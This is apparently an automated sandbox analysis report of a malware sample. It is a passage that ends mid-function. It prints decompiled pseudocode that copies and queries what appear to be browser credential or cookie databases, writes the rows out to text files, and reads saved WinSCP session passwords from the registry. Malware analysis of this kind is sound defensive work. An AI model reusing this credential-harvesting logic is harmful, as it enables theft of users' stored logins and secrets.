                                                                    • Opcode ID: ced4027cde9ca0b36e7e5c8dbd4773bde96a33cd44b336eb9152a3a3089ad117
                                                                    • Instruction ID: da2d975b3622cb05f64ff30bbcd312147f207bbfc31e733f449cecb09bbf03f8
                                                                    • Opcode Fuzzy Hash: ced4027cde9ca0b36e7e5c8dbd4773bde96a33cd44b336eb9152a3a3089ad117
                                                                    • Instruction Fuzzy Hash: D5E12FB5800259AFDF00EFE1DC49AEEBB79FF09305F05442AFA15B2162D7394944CB69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 36%
                                                                    			E0040EC59(void* __ebx, CHAR* __ecx, CHAR* __edx, CHAR* __edi, void* __esi, void* __eflags) {
                                                                    				void* _t84;
                                                                    				void* _t113;
                                                                    				CHAR* _t117;
                                                                    				CHAR* _t123;
                                                                    				CHAR* _t124;
                                                                    				CHAR* _t125;
                                                                    				CHAR* _t126;
                                                                    				CHAR* _t127;
                                                                    				CHAR* _t128;
                                                                    				CHAR* _t149;
                                                                    				void* _t153;
                                                                    				void* _t156;
                                                                    				void* _t157;
                                                                    				CHAR* _t159;
                                                                    				CHAR* _t168;
                                                                    				CHAR* _t181;
                                                                    				void* _t186;
                                                                    				void* _t187;
                                                                    				void* _t189;
                                                                    				void* _t190;
                                                                    
                                                                    				_t180 = __edi;
                                                                    				_push(0x264);
                                                                    				E0042083E(E00434DCE, __ebx, __edi, __esi);
                                                                    				_push( *0x445d8c);
                                                                    				 *(_t186 - 0x248) =  *(_t186 + 8);
                                                                    				 *((intOrPtr*)(_t186 - 0x26c)) =  *((intOrPtr*)(_t186 + 0xc));
                                                                    				_t159 = __edx;
                                                                    				 *((intOrPtr*)(_t186 - 0x260)) =  *((intOrPtr*)(_t186 + 0x10));
                                                                    				_t183 = __ecx;
                                                                    				_push(__edx);
                                                                    				 *(_t186 - 0x244) = __ecx;
                                                                    				 *((intOrPtr*)(_t186 - 0x268)) =  *((intOrPtr*)(_t186 + 0x14));
                                                                    				if( *0x446458() == 0) {
                                                                    					L2:
                                                                    					 *(_t186 - 0x244) = 0x43c8d8;
                                                                    					goto L4;
                                                                    				} else {
                                                                    					_t156 =  *0x446458(__edx,  *0x445db0);
                                                                    					_t194 = _t156;
                                                                    					if(_t156 != 0) {
                                                                    						_t157 =  *0x446458(__ecx,  *0x446044);
                                                                    						__eflags = _t157;
                                                                    						if(_t157 != 0) {
                                                                    							L4:
                                                                    							_t180 = 0;
                                                                    							E00426300(_t186 - 0x220, 0, 0x104);
                                                                    							lstrcatA(_t186 - 0x220,  *0x445fe0);
                                                                    							_t84 = 0x1a;
                                                                    							lstrcatA(_t186 - 0x220, E00415EF6(_t84, _t194));
                                                                    							CopyFileA( *(_t186 - 0x248), _t186 - 0x220, 1);
                                                                    							E00426300(_t186 - 0x118, 0, 0x104);
                                                                    							_t189 = _t187 + 0x18;
                                                                    							lstrcatA(_t186 - 0x118, 0x43c8e0);
                                                                    							lstrcatA(_t186 - 0x118,  *0x44603c);
                                                                    							lstrcatA(_t186 - 0x118, 0x43c8e0);
                                                                    							lstrcatA(_t186 - 0x118, _t159);
                                                                    							lstrcatA(_t186 - 0x118, "_");
                                                                    							lstrcatA(_t186 - 0x118,  *(_t186 - 0x244));
                                                                    							lstrcatA(_t186 - 0x118, ".txt");
                                                                    							_t183 =  *0x445d20; // 0x4c986c0
                                                                    							_push(_t186 - 0x254);
                                                                    							_push(_t186 - 0x220);
                                                                    							if( *0x446248() == 0) {
                                                                    								_t113 =  *0x4461fc( *((intOrPtr*)(_t186 - 0x254)), _t183, 0xffffffff, _t186 - 0x240, 0);
                                                                    								_t190 = _t189 + 0x14;
                                                                    								if(_t113 == 0) {
                                                                    									_t117 = HeapAlloc(GetProcessHeap(), 0, 0xf423f);
                                                                    									_push( *((intOrPtr*)(_t186 - 0x240)));
                                                                    									_t159 = _t117;
                                                                    									 *(_t186 - 0x244) = _t159;
                                                                    									if( *0x446218() == 0x64) {
                                                                    										_t183 = "\t";
                                                                    										while(1) {
                                                                    											_t123 =  *0x446238( *((intOrPtr*)(_t186 - 0x240)), _t180);
                                                                    											 *(_t186 - 0x25c) = _t123;
                                                                    											_t124 =  *0x446238( *((intOrPtr*)(_t186 - 0x240)), 1);
                                                                    											_t181 = _t124;
                                                                    											 *(_t186 - 0x250) = _t181;
                                                                    											_t125 =  *0x446238( *((intOrPtr*)(_t186 - 0x240)), 2);
                                                                    											 *(_t186 - 0x258) = _t125;
                                                                    											_t126 =  *0x446238( *((intOrPtr*)(_t186 - 0x240)), 3);
                                                                    											 *(_t186 - 0x24c) = _t126;
                                                                    											_t127 =  *0x446238( *((intOrPtr*)(_t186 - 0x240)), 4);
                                                                    											 *(_t186 - 0x248) = _t127;
                                                                    											_t128 =  *0x446238( *((intOrPtr*)(_t186 - 0x240)), 5);
                                                                    											_t190 = _t190 + 0x30;
                                                                    											_push("0");
                                                                    											_push(_t181);
                                                                    											 *(_t186 - 0x264) = _t128;
                                                                    											if( *0x446458() != 0) {
                                                                    												_push( *0x44612c);
                                                                    											} else {
                                                                    												_push( *0x445d70);
                                                                    											}
                                                                    											asm("stosd");
                                                                    											lstrcatA( *(_t186 - 0x250), ??);
                                                                    											_t180 =  *(_t186 - 0x24c);
                                                                    											_push("0");
                                                                    											_push( *(_t186 - 0x24c));
                                                                    											if( *0x446458() != 0) {
                                                                    												_push( *0x44612c);
                                                                    											} else {
                                                                    												_push( *0x445d70);
                                                                    											}
                                                                    											asm("stosd");
                                                                    											lstrcatA( *(_t186 - 0x24c), ??);
                                                                    											_t168 =  *(_t186 - 0x248);
                                                                    											if( *_t168 == 0x2d) {
                                                                    												_t180 = _t168;
                                                                    												asm("stosd");
                                                                    												lstrcatA(_t168, "0");
                                                                    											}
                                                                    											lstrcatA(_t159,  *(_t186 - 0x25c));
                                                                    											lstrcatA(_t159, _t183);
                                                                    											lstrcatA(_t159,  *(_t186 - 0x250));
                                                                    											lstrcatA(_t159, _t183);
                                                                    											lstrcatA(_t159,  *(_t186 - 0x258));
                                                                    											lstrcatA(_t159, _t183);
                                                                    											lstrcatA(_t159,  *(_t186 - 0x24c));
                                                                    											lstrcatA(_t159, _t183);
                                                                    											lstrcatA(_t159,  *(_t186 - 0x248));
                                                                    											lstrcatA(_t159, _t183);
                                                                    											lstrcatA(_t159,  *(_t186 - 0x264));
                                                                    											lstrcatA(_t159, _t183);
                                                                    											_t149 = E0040E874(_t186 - 0x23c,  *((intOrPtr*)(_t186 - 0x260)),  *0x44622c( *((intOrPtr*)(_t186 - 0x240)), 6,  *0x446224( *((intOrPtr*)(_t186 - 0x240)), 6,  *((intOrPtr*)(_t186 - 0x26c)))), _t180, _t183, 0);
                                                                    											 *(_t186 - 4) =  *(_t186 - 4) & 0x00000000;
                                                                    											if(_t149[0x14] >= 0x10) {
                                                                    												_t149 =  *_t149;
                                                                    											}
                                                                    											lstrcatA( *(_t186 - 0x244), _t149);
                                                                    											 *(_t186 - 4) =  *(_t186 - 4) | 0xffffffff;
                                                                    											E00404354(_t186 - 0x23c, 1, 0);
                                                                    											lstrcatA( *(_t186 - 0x244), 0x43c8dc);
                                                                    											_t153 =  *0x446218( *((intOrPtr*)(_t186 - 0x240)));
                                                                    											_t159 =  *(_t186 - 0x244);
                                                                    											if(_t153 != 0x64) {
                                                                    												goto L20;
                                                                    											}
                                                                    											_t180 = 0;
                                                                    											__eflags = 0;
                                                                    										}
                                                                    									}
                                                                    									L20:
                                                                    									E0041CE7C( *((intOrPtr*)(_t186 - 0x268)), _t186 - 0x118,  *0x446320(_t159), 3);
                                                                    								}
                                                                    								 *0x44621c( *((intOrPtr*)(_t186 - 0x240)));
                                                                    								 *0x44624c( *((intOrPtr*)(_t186 - 0x254)));
                                                                    							}
                                                                    							DeleteFileA(_t186 - 0x220);
                                                                    						}
                                                                    					} else {
                                                                    						goto L2;
                                                                    					}
                                                                    				}
                                                                    				return E00420888(_t159, _t180, _t183);
                                                                    			}
























                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0040EC63
                                                                    • StrCmpCA.SHLWAPI(?,00000264,00410360,?,?,?,?), ref: 0040EC9D
                                                                    • StrCmpCA.SHLWAPI(?,?,00000264,00410360,?,?,?,?), ref: 0040ECAE
                                                                    • StrCmpCA.SHLWAPI(?,?,?,00000264,00410360,?,?,?,?), ref: 0040ECCB
                                                                    • _memset.LIBCMT ref: 0040ECE9
                                                                    • lstrcatA.KERNEL32(?,?,?,?), ref: 0040ECFE
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040ED14
                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040ED29
                                                                    • _memset.LIBCMT ref: 0040ED38
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 0040ED4D
                                                                    • lstrcatA.KERNEL32(?), ref: 0040ED60
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 0040ED6E
                                                                    • lstrcatA.KERNEL32(?), ref: 0040ED7C
                                                                    • lstrcatA.KERNEL32(?,0043F090), ref: 0040ED8E
                                                                    • lstrcatA.KERNEL32(?,0043C8D8), ref: 0040EDA1
                                                                    • lstrcatA.KERNEL32(?,.txt), ref: 0040EDB3
                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040EE05
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040EE0C
                                                                    • StrCmpCA.SHLWAPI(00000000,00438004), ref: 0040EEBB
                                                                    • lstrcatA.KERNEL32(?), ref: 0040EEDC
                                                                    • StrCmpCA.SHLWAPI(?,00438004), ref: 0040EEEE
                                                                    • lstrcatA.KERNEL32(?), ref: 0040EF0F
                                                                    • lstrcatA.KERNEL32(?,00438004), ref: 0040EF2B
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040EF38
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040EF40
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040EF4D
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040EF55
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040EF62
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040EF6A
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040EF77
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040EF7F
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040EF8C
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040EF94
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040EFA1
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040EFA9
                                                                      • Part of subcall function 0040E874: __EH_prolog3_GS.LIBCMT ref: 0040E87B
                                                                      • Part of subcall function 0040E874: _memset.LIBCMT ref: 0040E8C9
                                                                      • Part of subcall function 0040E874: LocalAlloc.KERNEL32 ref: 0040E904
                                                                    • lstrcatA.KERNEL32(0043C8D8,00000000), ref: 0040EFFE
                                                                    • lstrcatA.KERNEL32(0043C8D8,0043C8DC,00000001,00000000), ref: 0040F022
                                                                    • lstrlen.KERNEL32(00000000), ref: 0040F045
                                                                    • DeleteFileA.KERNEL32(?), ref: 0040F086
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$_memset$AllocFileH_prolog3_Heap$CopyDeleteLocalProcesslstrlen
                                                                    • String ID: .txt
                                                                    • API String ID: 2450725088-2195685702
                                                                    • Opcode ID: 5e6ff73c4ecc493a3ec27dd4601ac94f74ff728cbadee09f34a950b3c40534fe
                                                                    • Instruction ID: 94be65da8792f97c9082f74c3879f6f0532abd93c2d4ce4e7d34510d3fc5c33e
                                                                    • Opcode Fuzzy Hash: 5e6ff73c4ecc493a3ec27dd4601ac94f74ff728cbadee09f34a950b3c40534fe
                                                                    • Instruction Fuzzy Hash: 82B12075900218AFDF206F60EC4DEDEBB79FB0A321F1104B5F609A2161DB358A94DF19
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 34%
                                                                    			E0040FB18(CHAR* __ecx, CHAR* __edx, CHAR* _a4, intOrPtr _a8) {
                                                                    				signed int _v8;
                                                                    				char _v276;
                                                                    				char _v540;
                                                                    				char _v544;
                                                                    				CHAR* _v548;
                                                                    				CHAR* _v552;
                                                                    				char _v556;
                                                                    				CHAR* _v560;
                                                                    				intOrPtr _v564;
                                                                    				CHAR* _v568;
                                                                    				CHAR* _v572;
                                                                    				CHAR* _v576;
                                                                    				CHAR* _v580;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t55;
                                                                    				void* _t63;
                                                                    				void* _t92;
                                                                    				CHAR* _t96;
                                                                    				CHAR* _t102;
                                                                    				CHAR* _t103;
                                                                    				CHAR* _t104;
                                                                    				CHAR* _t105;
                                                                    				CHAR* _t106;
                                                                    				CHAR* _t107;
                                                                    				CHAR* _t108;
                                                                    				CHAR* _t130;
                                                                    				CHAR* _t131;
                                                                    				CHAR* _t144;
                                                                    				CHAR* _t147;
                                                                    				signed int _t148;
                                                                    				void* _t149;
                                                                    				void* _t151;
                                                                    				void* _t152;
                                                                    				void* _t154;
                                                                    
                                                                    				_t142 = __edx;
                                                                    				_t55 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t55 ^ _t148;
                                                                    				_v548 = _a4;
                                                                    				_v564 = _a8;
                                                                    				_t130 = __ecx;
                                                                    				_t143 = __edx;
                                                                    				E00426300( &_v540, 0, 0x104);
                                                                    				lstrcatA( &_v540,  *0x445fe0);
                                                                    				_t63 = 0x1a;
                                                                    				lstrcatA( &_v540, E00415EF6(_t63, _t154));
                                                                    				CopyFileA(_t130,  &_v540, 1);
                                                                    				_t131 = 0;
                                                                    				E00426300( &_v276, 0, 0x104);
                                                                    				_t151 = _t149 + 0x18;
                                                                    				lstrcatA( &_v276, 0x43c8e0);
                                                                    				lstrcatA( &_v276,  *0x44603c);
                                                                    				lstrcatA( &_v276, 0x43c8e0);
                                                                    				lstrcatA( &_v276, _v548);
                                                                    				lstrcatA( &_v276, "_");
                                                                    				lstrcatA( &_v276, _t143);
                                                                    				lstrcatA( &_v276, ".txt");
                                                                    				_t147 =  *0x445be4; // 0x4c9cb38
                                                                    				_push( &_v556);
                                                                    				_push( &_v540);
                                                                    				if( *0x446248() == 0) {
                                                                    					_t92 =  *0x4461fc(_v556, _t147, 0xffffffff,  &_v544, 0);
                                                                    					_t152 = _t151 + 0x14;
                                                                    					if(_t92 == 0) {
                                                                    						_t96 = HeapAlloc(GetProcessHeap(), 0, 0xf423f);
                                                                    						_push(_v544);
                                                                    						_t131 = _t96;
                                                                    						if( *0x446218() == 0x64) {
                                                                    							_t147 = "\t";
                                                                    							do {
                                                                    								_t102 =  *0x446238(_v544, 0);
                                                                    								_v572 = _t102;
                                                                    								_t103 =  *0x446238(_v544, 1);
                                                                    								_t144 = _t103;
                                                                    								_v548 = _t144;
                                                                    								_t104 =  *0x446238(_v544, 2);
                                                                    								_v560 = _t104;
                                                                    								_t105 =  *0x446238(_v544, 3);
                                                                    								_v552 = _t105;
                                                                    								_t106 =  *0x446238(_v544, 4);
                                                                    								_v580 = _t106;
                                                                    								_t107 =  *0x446238(_v544, 5);
                                                                    								_v568 = _t107;
                                                                    								_t108 =  *0x446238(_v544, 6);
                                                                    								_t152 = _t152 + 0x38;
                                                                    								_push("0");
                                                                    								_push(_t144);
                                                                    								_v576 = _t108;
                                                                    								if( *0x446458() != 0) {
                                                                    									_push("FALSE");
                                                                    								} else {
                                                                    									_push("TRUE");
                                                                    								}
                                                                    								asm("stosd");
                                                                    								lstrcatA(_v548, ??);
                                                                    								_t143 = _v552;
                                                                    								_push("0");
                                                                    								_push(_v552);
                                                                    								if( *0x446458() != 0) {
                                                                    									_push("FALSE");
                                                                    								} else {
                                                                    									_push("TRUE");
                                                                    								}
                                                                    								asm("stosd");
                                                                    								lstrcatA(_v552, ??);
                                                                    								lstrcatA(_t131, _v572);
                                                                    								lstrcatA(_t131, _t147);
                                                                    								lstrcatA(_t131, _v548);
                                                                    								lstrcatA(_t131, _t147);
                                                                    								lstrcatA(_t131, _v560);
                                                                    								lstrcatA(_t131, _t147);
                                                                    								lstrcatA(_t131, _v552);
                                                                    								lstrcatA(_t131, _t147);
                                                                    								lstrcatA(_t131, _v580);
                                                                    								lstrcatA(_t131, _t147);
                                                                    								lstrcatA(_t131, _v568);
                                                                    								lstrcatA(_t131, _t147);
                                                                    								lstrcatA(_t131, _v576);
                                                                    								lstrcatA(_t131, 0x43c8dc);
                                                                    								_push(_v544);
                                                                    							} while ( *0x446218() == 0x64);
                                                                    						}
                                                                    						E0041CE7C(_v564,  &_v276,  *0x446320(_t131), 3);
                                                                    					}
                                                                    					 *0x44621c(_v544);
                                                                    					 *0x44624c(_v556);
                                                                    				}
                                                                    				return E0041DA9B(DeleteFileA( &_v540), _t131, _v8 ^ _t148, _t142, _t143, _t147);
                                                                    			}








































                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0040FB53
                                                                    • lstrcatA.KERNEL32(?,004132CB,0043C8D8,?), ref: 0040FB68
                                                                      • Part of subcall function 00415EF6: _malloc.LIBCMT ref: 00415EFC
                                                                      • Part of subcall function 00415EF6: GetTickCount.KERNEL32 ref: 00415F07
                                                                      • Part of subcall function 00415EF6: _rand.LIBCMT ref: 00415F1C
                                                                      • Part of subcall function 00415EF6: wsprintfA.USER32 ref: 00415F2F
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040FB7E
                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040FB8E
                                                                    • _memset.LIBCMT ref: 0040FB9F
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 0040FBB4
                                                                    • lstrcatA.KERNEL32(?), ref: 0040FBC7
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 0040FBD5
                                                                    • lstrcatA.KERNEL32(?,?), ref: 0040FBE8
                                                                    • lstrcatA.KERNEL32(?,0043F090), ref: 0040FBFA
                                                                    • lstrcatA.KERNEL32(?,?), ref: 0040FC08
                                                                    • lstrcatA.KERNEL32(?,.txt), ref: 0040FC1A
                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040FC6C
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040FC73
                                                                    • StrCmpCA.SHLWAPI(00000000,00438004), ref: 0040FD2D
                                                                    • lstrcatA.KERNEL32(?,FALSE), ref: 0040FD4C
                                                                    • StrCmpCA.SHLWAPI(?,00438004), ref: 0040FD5E
                                                                    • lstrcatA.KERNEL32(?,FALSE), ref: 0040FD7D
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040FD8A
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040FD92
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040FD9F
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040FDA7
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040FDB4
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040FDBC
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040FDC9
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040FDD1
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040FDDE
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040FDE6
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040FDF3
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040FDFB
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040FE08
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC), ref: 0040FE14
                                                                    • lstrlen.KERNEL32(00000000), ref: 0040FE31
                                                                    • DeleteFileA.KERNEL32(?), ref: 0040FE72
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$FileHeap_memset$AllocCopyCountDeleteProcessTick_malloc_randlstrlenwsprintf
                                                                    • String ID: .txt$FALSE$TRUE
                                                                    • API String ID: 2229245506-132372592
                                                                    • Opcode ID: 9eaee0db088990305f33169482a61d647fb440c1bd852cb5624de3474f48e72a
                                                                    • Instruction ID: 6d0c1cedb359ae07f58dec168b54c3305e13e0f553fd3335cac7b6417128e00b
                                                                    • Opcode Fuzzy Hash: 9eaee0db088990305f33169482a61d647fb440c1bd852cb5624de3474f48e72a
                                                                    • Instruction Fuzzy Hash: 3A91F275940218AFCF216BB0EC4DACEBB78BB0E361F1104B5F605E2161DB749A848F69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 82%
                                                                    			E00411867(void* __ebx, CHAR* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr _t125;
                                                                    				intOrPtr* _t136;
                                                                    				void* _t161;
                                                                    				void* _t178;
                                                                    				long _t182;
                                                                    				void* _t186;
                                                                    				CHAR* _t189;
                                                                    				CHAR* _t191;
                                                                    				char* _t199;
                                                                    				char* _t200;
                                                                    				char* _t201;
                                                                    				intOrPtr _t213;
                                                                    				intOrPtr _t214;
                                                                    				intOrPtr _t219;
                                                                    				intOrPtr* _t220;
                                                                    				void* _t224;
                                                                    
                                                                    				_t216 = __edi;
                                                                    				_push(0xdfc);
                                                                    				E0042083E(E004347CC, __ebx, __edi, __esi);
                                                                    				 *(_t224 - 0xde8) = 0;
                                                                    				 *(_t224 - 0x118) = 0;
                                                                    				E00426300(_t224 - 0x117, 0, 0x103);
                                                                    				_t218 = 0x3ff;
                                                                    				 *(_t224 - 0xdec) = 0x104;
                                                                    				 *(_t224 - 0xd18) = 0;
                                                                    				E00426300(_t224 - 0xd17, 0, 0x3ff);
                                                                    				 *(_t224 - 0x918) = 0;
                                                                    				E00426300(_t224 - 0x917, 0, 0x3ff);
                                                                    				 *((char*)(_t224 - 0x518)) = 0;
                                                                    				E00426300(_t224 - 0x517, 0, 0x3ff);
                                                                    				_t11 = _t218 + 1; // 0x400
                                                                    				_t125 = _t11;
                                                                    				_t213 = _t125;
                                                                    				_t199 = _t224 - 0xd18;
                                                                    				goto L1;
                                                                    				do {
                                                                    					L3:
                                                                    					 *_t200 = 0;
                                                                    					_t200 = _t200 + 1;
                                                                    					_t214 = _t214 - 1;
                                                                    				} while (_t214 != 0);
                                                                    				_t215 = _t125;
                                                                    				_t201 = _t224 - 0x518;
                                                                    				do {
                                                                    					 *_t201 = 0;
                                                                    					_t201 = _t201 + 1;
                                                                    					_t215 = _t215 - 1;
                                                                    				} while (_t215 != 0);
                                                                    				 *((intOrPtr*)(_t224 - 0xdf8)) = _t125;
                                                                    				 *((intOrPtr*)(_t224 - 0xdf0)) = _t125;
                                                                    				 *((intOrPtr*)(_t224 - 0xe00)) = _t125;
                                                                    				if(RegOpenKeyExW(0x80000001, L"Software\\Martin Prikryl\\WinSCP 2\\Configuration", 0, 1, _t224 - 0xde0) != 0) {
                                                                    					L33:
                                                                    					return E00420888(0, _t216, _t218);
                                                                    				}
                                                                    				_t219 = 0xf;
                                                                    				 *(_t224 - 0xd3c) = 0x3ff;
                                                                    				 *((intOrPtr*)(_t224 - 0xd40)) = 0;
                                                                    				 *((char*)(_t224 - 0xd50)) = 0;
                                                                    				E00404331(_t224 - 0xd50,  *0x446000);
                                                                    				 *(_t224 - 4) = 0;
                                                                    				 *((intOrPtr*)(_t224 - 0xd58)) = _t219;
                                                                    				 *((intOrPtr*)(_t224 - 0xd5c)) = 0;
                                                                    				 *((char*)(_t224 - 0xd6c)) = 0;
                                                                    				E00404331(_t224 - 0xd6c,  *0x4461a8);
                                                                    				 *(_t224 - 4) = 1;
                                                                    				_t220 = E004160E8(_t224 - 0xd50, _t224 - 0xdc0);
                                                                    				 *(_t224 - 4) = 2;
                                                                    				_t136 = E004160E8(_t224 - 0xd6c, _t224 - 0xddc);
                                                                    				 *(_t224 - 4) = 3;
                                                                    				if( *((intOrPtr*)(_t220 + 0x14)) >= 8) {
                                                                    					_t220 =  *_t220;
                                                                    				}
                                                                    				if( *((intOrPtr*)(_t136 + 0x14)) >= 8) {
                                                                    					_t136 =  *_t136;
                                                                    				}
                                                                    				 *((char*)(_t224 - 0xde1)) =  *0x446270( *(_t224 - 0xde0), _t136, _t220, 0x10, 0, _t224 - 0xe04, _t224 - 0xe08) != 0;
                                                                    				_t216 = 0;
                                                                    				E0040C148(0, _t224 - 0xddc, 1);
                                                                    				_t218 = _t224 - 0xdc0;
                                                                    				E0040C148(0, _t224 - 0xdc0, 1);
                                                                    				E00404354(_t224 - 0xd6c, 1, 0);
                                                                    				 *(_t224 - 4) =  *(_t224 - 4) | 0xffffffff;
                                                                    				E00404354(_t224 - 0xd50, 1, 0);
                                                                    				if( *((intOrPtr*)(_t224 - 0xde1)) != 0 &&  *(_t224 - 0xde0) != 0) {
                                                                    					RegCloseKey( *(_t224 - 0xde0));
                                                                    					 *(_t224 - 0xde0) = 0;
                                                                    				}
                                                                    				if( *((intOrPtr*)(_t224 - 0xe04)) == 0) {
                                                                    					L17:
                                                                    					if( *(_t224 - 0xde0) != 0) {
                                                                    						RegCloseKey( *(_t224 - 0xde0));
                                                                    						 *(_t224 - 0xde0) = 0;
                                                                    					}
                                                                    					goto L19;
                                                                    				} else {
                                                                    					if( *(_t224 - 0xde0) == 0) {
                                                                    						L19:
                                                                    						if(RegOpenKeyExW(0x80000001, L"Software\\Martin Prikryl\\WinSCP 2\\Sessions", 0, 9, _t224 - 0xde0) != 0) {
                                                                    							goto L33;
                                                                    						}
                                                                    						if(RegEnumKeyExA( *(_t224 - 0xde0), 0, _t224 - 0x118, _t224 - 0xdec, 0, 0, 0, 0) != 0) {
                                                                    							L31:
                                                                    							if( *(_t224 - 0xde0) != 0) {
                                                                    								RegCloseKey( *(_t224 - 0xde0));
                                                                    							}
                                                                    							goto L33;
                                                                    						} else {
                                                                    							goto L21;
                                                                    						}
                                                                    						do {
                                                                    							L21:
                                                                    							lstrcatA( *0x446250, 0x43c8dc);
                                                                    							lstrcatA( *0x446250,  *0x445bf8);
                                                                    							lstrcatA( *0x446250, 0x43c8dc);
                                                                    							lstrcatA( *0x446250,  *0x446100);
                                                                    							 *0x446310( *(_t224 - 0xde0), _t224 - 0x118,  *0x445b68, 2, 0, _t224 - 0xd18, _t224 - 0xdf8);
                                                                    							lstrcatA( *0x446250, _t224 - 0xd18);
                                                                    							_t216 = 4;
                                                                    							 *(_t224 - 0xdf4) = _t216;
                                                                    							_t161 =  *0x446310( *(_t224 - 0xde0), _t224 - 0x118,  *0x445c9c, 0xffff, 0, _t224 - 0xdfc, _t224 - 0xdf4);
                                                                    							_t246 = _t161;
                                                                    							if(_t161 != 0) {
                                                                    								lstrcatA( *0x446250, ":22");
                                                                    							} else {
                                                                    								_push( *((intOrPtr*)(_t224 - 0xdfc)));
                                                                    								_t191 = E00415F45(0, _t224 - 0xd88, _t215, _t216, 0x43c8dc, _t246);
                                                                    								 *(_t224 - 4) = _t216;
                                                                    								if(_t191[0x14] >= 0x10) {
                                                                    									_t191 =  *_t191;
                                                                    								}
                                                                    								lstrcatA( *0x446250, _t191);
                                                                    								 *(_t224 - 4) =  *(_t224 - 4) | 0xffffffff;
                                                                    								E00404354(_t224 - 0xd88, 1, 0);
                                                                    							}
                                                                    							lstrcatA( *0x446250, 0x43c8dc);
                                                                    							lstrcatA( *0x446250,  *0x445c48);
                                                                    							 *0x446310( *(_t224 - 0xde0), _t224 - 0x118,  *0x446178, 2, 0, _t224 - 0x918, _t224 - 0xdf0);
                                                                    							lstrcatA( *0x446250, _t224 - 0x918);
                                                                    							 *((intOrPtr*)(_t224 - 0xd20)) = 0xf;
                                                                    							 *((intOrPtr*)(_t224 - 0xd24)) = 0;
                                                                    							 *(_t224 - 0xd34) = 0;
                                                                    							 *(_t224 - 4) = 5;
                                                                    							 *0x446310( *(_t224 - 0xde0), _t224 - 0x118,  *0x445da8, 2, 0, _t224 - 0x518, _t224 - 0xe00);
                                                                    							lstrcatA( *0x446250, 0x43c8dc);
                                                                    							lstrcatA( *0x446250,  *0x4460c4);
                                                                    							_t178 =  *0x446458(_t224 - 0x518, 0x43c8d8);
                                                                    							_t248 = _t178;
                                                                    							if(_t178 != 0) {
                                                                    								_t215 = _t224 - 0xda4;
                                                                    								_t186 = E004113E3(0, _t224 - 0x518, _t224 - 0xda4, _t216, 0x43c8dc, _t248, _t224 - 0xd18, _t224 - 0x918);
                                                                    								_t216 = _t224 - 0xd34;
                                                                    								 *(_t224 - 4) = 6;
                                                                    								E004042ED(_t216, _t186);
                                                                    								 *(_t224 - 4) = 5;
                                                                    								E00404354(_t224 - 0xda4, 1, 0);
                                                                    								_t189 =  *(_t224 - 0xd34);
                                                                    								if( *((intOrPtr*)(_t224 - 0xd20)) < 0x10) {
                                                                    									_t189 = _t216;
                                                                    								}
                                                                    								lstrcatA( *0x446250, _t189);
                                                                    							}
                                                                    							lstrcatA( *0x446250, "\n\n");
                                                                    							 *(_t224 - 0xde8) =  *(_t224 - 0xde8) + 1;
                                                                    							 *(_t224 - 0xdec) = 0x104;
